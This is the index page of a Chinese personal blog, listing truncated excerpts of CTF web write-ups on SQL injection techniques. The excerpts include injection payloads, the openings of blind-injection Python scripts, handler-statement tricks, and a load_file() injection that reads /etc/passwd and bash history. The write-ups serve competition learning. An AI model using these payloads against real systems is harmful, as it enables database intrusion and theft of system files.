刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

2020年新春战“疫”—网络安全公益赛 Web 盲注 Writeup(sql注入,REGEXP注入,greatest注入)

<?php     # flag在fl4g里     include 'waf.php';     header("Content-type: text/html; charset=utf-8");      $db = 

2020年新春战“疫”—网络安全公益赛 Web Ezsqli Writeup(sql注入,过滤or,无法获取表名列名的解决办法)

测试出注入点2-(ascii(substr(database(),1,1))>1)由于过滤了or和union select,无法通过常规手段获取表名和字段名,使用mysql5.7新特性获得表名,使用select语句比较时按各字段进行比较的特点,来构造盲注语句,代码如下:#encoding=utf-8 import requests def str_to_hex(s):     return '

2020年新春战“疫”—网络安全公益赛 Web blacklist Writeup(sql注入,mysql handler函数)

熟悉的界面,点击输入框,出现以前的题输入过的payload,试一试就得到了flag,应该是原题1';show tables;#1';handler FlagHere open;handler FlagHere read first;#

2020年新春战“疫”—网络安全公益赛 Web easysqli_copy Writeup(sql注入,​宽字节注入+存储过程绕过+语句转十六进制)

宽字节注入+存储过程绕过+语句转十六进制脚本如下import requests flag = "" cookie = {     'ci_session': '934c5dbfca4a789a17b73c1f36c6ec78b81b02b3',     'UM_distinctid

XCTF 攻防世界 web进阶 comment WriteUp(代码审计,git泄露,sql注入)

git泄露python GitHack.py http://xxxxxxxx/.git根据提示去猜解爆破即可user:zhangwei pass:zhangwei666代码审计后发现注入点查询/etc/passwd : ',content=(select load_file('//etc/passwd')),/*闭合查询语句得到结果以此方法继续查询/bin/bash_history   :  ',content=(select loa

SWPU CTF2019 Web4 WriteUp (sql注入,代码审计,堆叠注入,PDO,文件包含)

注入脚本:# coding=utf-8 import re import requests import sys import binascii import json reload(sys) sys.setdefaultencoding("utf8") url = "http://182.92.220.157:11116/index.php?r=Login/Logi

SWPU CTF2019 Web1 WriteUp (0'*'0注入)

知识点:sql注入注入点  0'/**/||/**/ascii(substr((select/**/pass/**/from/**/users/**/where/**/name='flag'),0,1))/**/>/**/ascii('53')/**/||/**/'0先注册个用户,然后发布广告广告的title可以注入注入脚本# coding=utf-8 import re import r

buuoj web [CISCN2019 华北赛区 Day2 Web1]Hack World writeup

利用抑或注入# coding=utf-8 import requests dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,-{}" url = "http://f1f5f36b-b735-4827-8ff2-1582d26acb7b.node3.buuoj.cn/index.php" keyw

CTF中几种通用的sql盲注手法和注入的一些tips

0x00 前言在ctf比赛中难免会遇到一些比较有(keng)趣(die)的注入题,需要我们一步步的绕过waf和过滤规则,这种情况下大多数的注入方法都是盲注。然而在盲注过程中由于这些过滤规则不太好绕过,这时候就会无从下手,下面分享一下自己在比赛中总结几种比较通用的盲注手法和一些小tips,希望能在今后大家的比赛或者实战中带来一些实质性的帮助。0x01 XOR注入1、基本注入payloadadmin'^(ascii(mid((password)from(i)))>j)^'1&#

过滤括号的sql盲注

`http://web2.sniperoj.cn:10004/?username&password`得到信息:Flag is the password of admin!所以接下来的思路应该是拿admin的password,肯定是注入了然后根据题目观察来看,应该是一道盲注题,但是我尝试了一些姿势,但是不太懂为何我的payload不能照我预期进行,我也进行了本地测试,但是本地是成功的……所以很郁闷,所以引用了网上别的的脚本:#!/usr/bin/python # coding:

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.